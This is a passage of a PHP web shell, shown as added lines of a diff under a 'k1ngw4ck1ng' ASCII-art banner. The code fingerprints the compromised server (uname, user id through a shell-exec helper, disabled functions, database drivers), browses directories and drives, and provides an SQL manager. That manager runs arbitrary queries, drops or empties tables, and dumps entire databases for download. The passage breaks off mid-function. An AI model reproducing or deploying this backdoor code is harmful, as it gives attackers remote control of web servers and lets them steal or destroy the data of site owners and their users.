+ <font color="#333333">k1ngw4ck1ng</font><font color="white">w</font><font color="#333333">4ck1</font><font color="white">ngw4ck1n</font><font color="#333333">gw4c</font><font color="white">k</font><font color="#333333">1ngw4ck</font><font color="white">1ngw</font><font color="#333333">4ck</font><font color="white">1</font><font color="#333333">ngw4ck1ngw4ck1ng</font><font color="white">w4</font><font color="#333333">ck1ngw4ck1</font><font color="white">n</font><font color="#333333">gw4ck1ngw</font><font color="white">4</font><font color="#333333">ck1ngw4ck1</font><font color="white">n</font><font color="#333333">gw4c</font><font color="white">k1ng</font><font color="#333333">w4ck1ngw4ck1ngw4ck1ngw4ck1ng</font><br>
+
+      <font color="#333333">w4ck1ngw4c</font><font color="white">k1n</font><font color="#333333">gw4ck</font><font color="white">1ngw4</font><font color="#333333">ck</font><font color="white">1ngw4ck1n</font><font color="#333333">gw</font><font color="white">4ck1n</font><font color="#333333">g</font><font color="white">w</font><font color="#333333">4ck1ngw4ck</font><font color="white">1ngw4</font><font color="#333333">ck</font><font color="white">1ng</font><font color="#333333">w4ck1n</font><font color="white">gw4ck1</font><font color="#333333">ngw4ck</font><font color="white">1n</font><font color="#333333">gw4ck1ngw</font><font color="white">4ck</font><font color="#333333">1ng</font><font color="white">w4ck</font><font color="#333333">1ngw4ck1ngw4ck1ngw4ck1ngw4ck</font><br>
+
+      <font color="#333333">1ngw4ck1ng</font><font color="white">w4ck</font><font color="#333333">1ngw</font><font color="white">4ck1</font><font color="#333333">ngw4</font><font color="white">ck1</font><font color="#333333">ng</font><font color="white">w4c</font><font color="#333333">k1</font><font color="white">ngw4</font><font color="#333333">c</font><font color="white">k1</font><font color="#333333">ngw</font><font color="white">4</font><font color="#333333">ck</font><font color="white">1ngw4ck1ng</font><font color="#333333">w</font><font color="white">4ck</font><font color="#333333">1ng</font><font color="white">w4ck1n</font><font color="#333333">gw4ck1ngw</font><font color="white">4ck</font><font color="#333333">1ngw4ck1</font><font color="white">ngw4</font><font color="#333333">c</font><font color="white">k1ngw</font><font color="#333333">4ck1n</font><font color="white">gw4ck1ngw4ck</font><font color="#333333">1ngw4ck1ngw</font><br>
+
+      <font color="#333333">4ck1ngw4ck1</font><font color="white">ngw4</font><font color="#333333">ck</font><font color="white">1ngw4</font><font color="#333333">ck1</font><font color="white">ngw4</font><font color="#333333">ck1ngw</font><font color="white">4ck1</font><font color="#333333">n</font><font color="white">gw4</font><font color="#333333">ck1</font><font color="white">ngw4ck</font><font color="#333333">1ngw4</font><font color="white">ck</font><font color="#333333">1</font><font color="white">ngw4ck1n</font><font color="#333333">gw4ck1ngw4ck</font><font color="white">1ngw</font><font color="#333333">4ck1ngw4</font><font color="white">ck1n</font><font color="#333333">g</font><font color="white">w4ck1ngw4ck</font><font color="#333333">1ngw4c</font><font color="white">k1ngw</font><font color="#333333">4ck1ngw4ck1</font><br>
+
+      <font color="#333333">ngw4ck1ngw4c</font><font color="white">k1ngw4ck1ng</font><font color="#333333">w4</font><font color="white">ck1n</font><font color="#333333">gw4ck1</font><font color="white">ngw4</font><font color="#333333">c</font><font color="white">k1ngw4ck1n</font><font color="#333333">gw4ck1n</font><font color="white">gw4ck1ngw4ck</font><font color="#333333">1ngw4ck1ng</font><font color="white">w4ck1</font><font color="#333333">ngw4ck1</font><font color="white">ngw4ck1ngw4ck1ng</font><font color="#333333">w4ck1ng</font><font color="white">w4ck1n</font><font color="#333333">gw4ck1ngw4</font><br>
+
+      <font color="#333333">ck1ngw4ck1ng</font><font color="white">w4ck1ngw</font><font color="#333333">4c</font><font color="white">k1ngw4c</font><font color="#333333">k1ng</font><font color="white">w4ck1ngw4c</font><font color="#333333">k1n</font><font color="white">gw4c</font><font color="#333333">k1ngw4c</font><font color="white">k1ngw4ck1ngw4ck</font><font color="#333333">1ngw4c</font><font color="white">k1</font><font color="#333333">n</font><font color="white">gw4</font><font color="#333333">ck1ngw4</font><font color="white">ck1ngw4ck1ngw4ck1ngw4ck1ngw</font><font color="#333333">4ck1ngw4ck1n</font><br>
+
+      <font color="#333333">gw4ck1ngw4ck1</font><font color="white">ngw4ck</font><font color="#333333">1ngw</font><font color="white">4ck1ng</font><font color="#333333">w4c</font><font color="white">k1ngw</font><font color="#333333">4</font><font color="white">ck1n</font><font color="#333333">gw4c</font><font color="white">k1ng</font><font color="#333333">w4ck1n</font><font color="white">gw4ck1ngw4ck1ngw4ck1</font><font color="#333333">ngw4ck</font><font color="white">1ng</font><font color="#333333">w4ck1n</font><font color="white">gw4</font><font color="#333333">c</font><font color="white">k1ngw4</font><font color="#333333">ck1</font><font color="white">ngw4</font><font color="#333333">ck1ngw4</font><font color="white">ck1</font><font color="#333333">ngw4ck1ngw4c</font><br>
+
+      <font color="#333333">k1ngw4ck1ngw4c</font><font color="white">k1ngw</font><font color="#333333">4ck1n</font><font color="white">gw4ck</font><font color="#333333">1ngw4ck1n</font><font color="white">gw4c</font><font color="#333333">k1ngw</font><font color="white">4ck1ngw4ck1n</font><font color="#333333">g</font><font color="white">w4ck1</font><font color="#333333">ngw4</font><font color="white">ck1ngw4ck</font><font color="#333333">1ngw</font><font color="white">4ck</font><font color="#333333">1ngw4c</font><font color="white">k1n</font><font color="#333333">gw</font><font color="white">4ck1</font><font color="#333333">ngw4ck1n</font><font color="white">g</font><font color="#333333">w4ck1n</font><font color="white">gw4c</font><font color="#333333">k1ngw4ck1ng</font><br>
+
+      <font color="#333333">w4ck1ngw4ck1ngw4</font><font color="white">ck1</font><font color="#333333">ngw4ck</font><font color="white">1ngw</font><font color="#333333">4ck1ngw4</font><font color="white">ck1ng</font><font color="#333333">w4ck1n</font><font color="white">gw4ck1ngw</font><font color="#333333">4ck1</font><font color="white">ngw4</font><font color="#333333">ck1ngw4ck</font><font color="white">1ngw4ck1ngw4c</font><font color="#333333">k1n</font><font color="white">gw4</font><font color="#333333">ck1n</font><font color="white">gw4</font><font color="#333333">ck1ngw4ck1ngw</font><font color="white">4ck1ng</font><font color="#333333">w4ck1ngw4ck</font><br>
+
+      <font color="#333333">1ngw4ck1ngw4ck1ngw4ck1ngw4</font><font color="white">c</font><font color="#333333">k1ngw4ck1ng</font><font color="white">w</font><font color="#333333">4ck1ngw4ck1ngw4ck1ngw4ck1n</font><font color="white">g</font><font color="#333333">w4ck1ngw4c</font><font color="white">k1ngw4</font><font color="#333333">c</font><font color="white">k</font><font color="#333333">1ngw4c</font><font color="white">k1n</font><font color="#333333">gw4c</font><font color="white">k1n</font><font color="#333333">gw4ck1ngw4ck1ngw</font><font color="white">4ck1n</font><font color="#333333">gw4ck1ngw</font><br>
+
+      <font color="#333333">4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ng</font><font color="white">w4</font><font color="#333333">ck1ngw4ck1ngw4ck1n</font><font color="white">gw4ck</font><font color="#333333">1ngw4ck1</font><br>
+      <font color="#333333">ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1</font><font color="white">n</font><font color="#333333">gw4ck1ngw4ck1ngw4ck1ng</font><font color="white">w</font><font color="#333333">4ck1ngw4</font></br>
+  </span>&nbsp;</p></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>System Info:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><? echo "<b>Disabled functions</b>: <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} ?><p align="left"><b>We are: <?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?><?php $curl_on = @function_exists('curl_version');
+echo "<br/>cURL: <b>".(($curl_on)?("<font color=green>ON</font>"):("<font color=red>OFF</font>")); ?></br><? if(@ini_get("register_globals")){$reg_g="<font color=green>ON</font>";}else{$reg_g="<font color=red>OFF</font>";} echo("<b>Register globals:</b> $reg_g"); ?><?php echo "<br/>MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; }
+echo "</b>";
+echo "<br/>MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} ?><?php echo "<br/>PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} ?><?php echo "<br/>Oracle: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} ?> </b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+$d = str_replace("\\\\","\\",$d);
+$dispd = htmlspecialchars($d);
+$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
+$i = 0;
+foreach($pd as $b)
+{
+ $t = "";
+ $j = 0;
+ foreach ($e as $r)
+ {
+  $t.= $r.DIRECTORY_SEPARATOR;
+  if ($j == $i) {break;}
+  $j++;
+ }
+ echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
+ $i++;
+}
+echo "&nbsp;&nbsp;&nbsp;";
+if (is_writable($d))
+{
+ $wd = TRUE;
+ $wdt = "<font color=green>[ ok ]</font>";
+ echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
+}
+else
+{
+ $wd = FALSE;
+ $wdt = "<font color=red>[ Read-Only ]</font>";
+ echo "<b>".view_perms_color($d)."</b>";
+}
+if (is_callable("disk_free_space"))
+{
+ $free = disk_free_space($d);
+ $total = disk_total_space($d);
+ if ($free === FALSE) {$free = 0;}
+ if ($total === FALSE) {$total = 0;}
+ if ($free < 0) {$free = 0;}
+ if ($total < 0) {$total = 0;}
+ $used = $total-$free;
+ $free_percent = round(100/($total/$free),2);
+ echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";
+
+}
+echo "<br>";
+echo "<b>Your ip: <a href=http://".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a> - Server ip: <a href=http://".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a></b><br/>";
+$letters = "";
+if ($win)
+{
+ $v = explode("\\",$d);
+ $v = $v[0];
+ foreach (range("a","z") as $letter)
+ {
+  $bool = $isdiskette = in_array($letter,$safemode_diskettes);
+  if (!$bool) {$bool = is_dir($letter.":\\");}
+  if ($bool)
+  {
+   $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ ";
+   if ($letter.":" != $v) {$letters .= $letter;}
+   else {$letters .= "<font color=green>".$letter."</font>";}
+   $letters .= " ]</a> ";
+  }
+ }
+ if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";}
+}
+if (count($quicklaunch) > 0)
+{
+ foreach($quicklaunch as $item)
+ {
+  $item[1] = str_replace("%d",urlencode($d),$item[1]);
+  $item[1] = str_replace("%sort",$sort,$item[1]);
+  $v = realpath($d."..");
+  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
+  $item[1] = str_replace("%upd",urlencode($v),$item[1]);
+  echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
+ }
+}
+echo "</p></td></tr></table><br>";
+if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
+echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
+if ($act == "") {$act = $dspact = "ls";}
+if ($act == "sql")
+{
+ $sql_surl = $surl."act=sql";
+ if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
+ if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
+ if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
+ if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
+ $sql_surl .= "&";
+ ?><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
+ if ($sql_server)
+ {
+  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
+  $err = mysql_smarterror();
+  @mysql_select_db($sql_db,$sql_sock);
+  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
+ }
+ else {$sql_sock = FALSE;}
+ echo "<b>SQL Manager:</b><br>";
+ if (!$sql_sock)
+ {
+  if (!$sql_server) {echo "NO CONNECTION";}
+  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
+ }
+ else
+ {
+  $sqlquicklaunch = array();
+  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
+  $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
+  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
+  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
+  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
+  $sqlquicklaunch[] = array("Logout",$surl."act=sql");
+  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
+  echo "</center>";
+ }
+ echo "</td></tr><tr>";
+ if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"><br/></font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
+ else
+ {
+  //Start left panel
+  if (!empty($sql_db))
+  {
+   ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."w4/act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_tables($sql_db);
+   if (!$result) {echo mysql_smarterror();}
+   else
+   {
+    echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
+    $c = 0;
+    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
+    if (!$c) {echo "No tables found in database.";}
+   }
+  }
+  else
+  {
+   ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_dbs($sql_sock);
+   if (!$result) {echo mysql_smarterror();}
+   else
+   {
+    ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
+    $c = 0;
+    $dbs = "";
+    while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
+    echo "<option value=\"\">Databases (".$c.")</option>";
+    echo $dbs;
+   }
+   ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
+  }
+  //End left panel
+  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
+  //Start center panel
+  $diplay = TRUE;
+  if ($sql_db)
+  {
+   if (!is_numeric($c)) {$c = 0;}
+   if ($c == 0) {$c = "no";}
+   echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
+   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
+   echo "</b></center>";
+   $acts = array("","dump");
+   if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
+   elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
+   elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
+   elseif ($sql_tbl_act == "insert")
+   {
+    if ($sql_tbl_insert_radio == 1)
+    {
+     $keys = "";
+     $akeys = array_keys($sql_tbl_insert);
+     foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
+     if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
+     $values = "";
+     $i = 0;
+     foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
+     if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
+     $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+    elseif ($sql_tbl_insert_radio == 2)
+    {
+     $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
+     $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
+     $result = mysql_query($sql_query) or print(mysql_smarterror());
+     $result = mysql_fetch_array($result, MYSQL_ASSOC);
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+   }
+   if ($sql_act == "query")
+   {
+    echo "<hr size=\"1\" noshade>";
+    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+    if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";}
+   }
+   if (in_array($sql_act,$acts))
+   {
+    ?><table border="0" width="100%" height="1"><tr>
+    <td width="30%" height="1"><b>Create a new table:</b>
+      <form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td>
+    
+    <td width="30%" height="1"><b>Dump DataBase:</b>
+      <form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
+    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
+    if ($sql_act == "newtbl")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
+    }
+    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+   }
+   elseif ($sql_act == "dump")
+   {
+    if (empty($submit))
+    {
+     $diplay = FALSE;
+     echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
+     echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
+     $v = join (";",$dmptbls);
+     echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
+     if ($dump_file) {$tmp = $dump_file;}
+     else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
+     echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
+     echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
+     echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
+     echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
+     echo "</form>";
+    }
+    else
+    {
+     $diplay = TRUE;
+     $set = array();
+     $set["sock"] = $sql_sock;
+     $set["db"] = $sql_db;
+     $dump_out = "download";
+     $set["print"] = 0;
+     $set["nl2br"] = 0;
+     $set[""] = 0;
+     $set["file"] = $dump_file;
+     $set["add_drop"] = TRUE;
+     $set["onlytabs"] = array();
+     if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
+     $ret = mysql_dump($set);
+     if ($sql_dump_download)
+     {
+      @ob_clean();
+      header("Content-type: application/octet-stream");
+      header("Content-length: ".strlen($ret));
+      header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
+      echo $ret;
+      exit;
+     }
+     elseif ($sql_dump_savetofile)
+     {
+      $fp = fopen($sql_dump_file,"w");
+      if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
+      else
+      {
+       fwrite($fp,$ret);
+       fclose($fp);
+       echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
+      }
+     }
+     else {echo "<b>Dump: nothing to do!</b>";}
+    }
+   }
+   if ($diplay)
+   {
+    if (!empty($sql_tbl))
+    {
+     if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
+     $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
+     $count_row = mysql_fetch_array($count);
+     mysql_free_result($count);
+     $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
+     $tbl_struct_fields = array();
+     while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
+     if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
+     if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
+     if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
+     if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
